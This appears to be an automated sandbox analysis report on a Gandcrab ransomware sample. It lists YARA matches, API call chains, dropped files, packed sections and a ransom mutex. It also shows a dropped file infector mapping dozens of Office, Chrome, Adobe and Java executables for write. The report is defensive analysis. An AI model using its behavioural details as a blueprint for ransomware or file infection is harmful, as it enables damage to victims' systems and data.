                    Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F391C20
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F391020
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3A9B71
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3983C0
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C26D00
                    Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SciTE.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SY5DeZW6pz.exeStatic PE information: Number of sections : 57 > 10
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\vSQshX.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                    Source: vSQshX.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: vSQshX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: vSQshX.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                    Source: SY5DeZW6pz.exeVirustotal: Detection: 81%
                    Source: SY5DeZW6pz.exeMetadefender: Detection: 65%
                    Source: SY5DeZW6pz.exeReversingLabs: Detection: 95%
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\SY5DeZW6pz.exe "C:\Users\user\Desktop\SY5DeZW6pz.exe"
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C2119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeFile created: C:\Users\user\AppData\Local\Temp\vSQshX.exeJump to behavior
                    Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@7/17@1/2
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3946F0 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification,
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5540
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeMutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=f816ca825b40424e
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeAutomated click: OK
                    Source: SY5DeZW6pz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

                    Data Obfuscation

                    barindex
                    Yara detected ReflectiveLoader
                    Source: Yara matchFile source: SY5DeZW6pz.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.324788306.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.317714677.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3A8E7B push ebp; ret
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3A8E85 push 00000000h; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C21638 push dword ptr [00C23084h]; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C2600A push ebp; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C26014 push 00C214E1h; ret
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C22D9B push ecx; ret
                    Source: SY5DeZW6pz.exeStatic PE information: section name: |Zu8
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_0
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_1
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_2
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_3
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_4
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_5
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_6
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_7
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_8
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_9
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_10
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_11
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_12
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_13
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_14
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_15
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_16
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_17
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_18
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_19
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_20
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_21
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_22
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_23
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_24
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_25
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_26
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_27
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_28
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_29
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_30
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_31
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_32
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_33
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_34
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_35
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_36
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_37
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_38
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_39
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_40
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_41
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_42
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_43
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_44
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_45
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_46
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_47
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_48
                    Source: SY5DeZW6pz.exeStatic PE information: section name: .dat_49
                    Source: vSQshX.exe.0.drStatic PE information: section name: .aspack
                    Source: vSQshX.exe.0.drStatic PE information: section name: .adata
                    Source: MyProg.exe.1.drStatic PE information: section name: PELIB
                    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
                    Source: SciTE.exe.1.drStatic PE information: section name: ruO
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,
                    Source: initial sampleStatic PE information: section where entry point is pointing to: |Zu8
                    Source: initial sampleStatic PE information: section name: |Zu8 entropy: 6.934749160260163
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.81169422100848
                    Source: initial sampleStatic PE information: section name: Y|uR entropy: 6.934889298048315
                    Source: initial sampleStatic PE information: section name: ruO entropy: 6.934278783546333

                    Persistence and Installation Behavior

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\misc.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync99.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3Help.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\chrome.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Uninstall.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Check.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msoev.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Info.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe
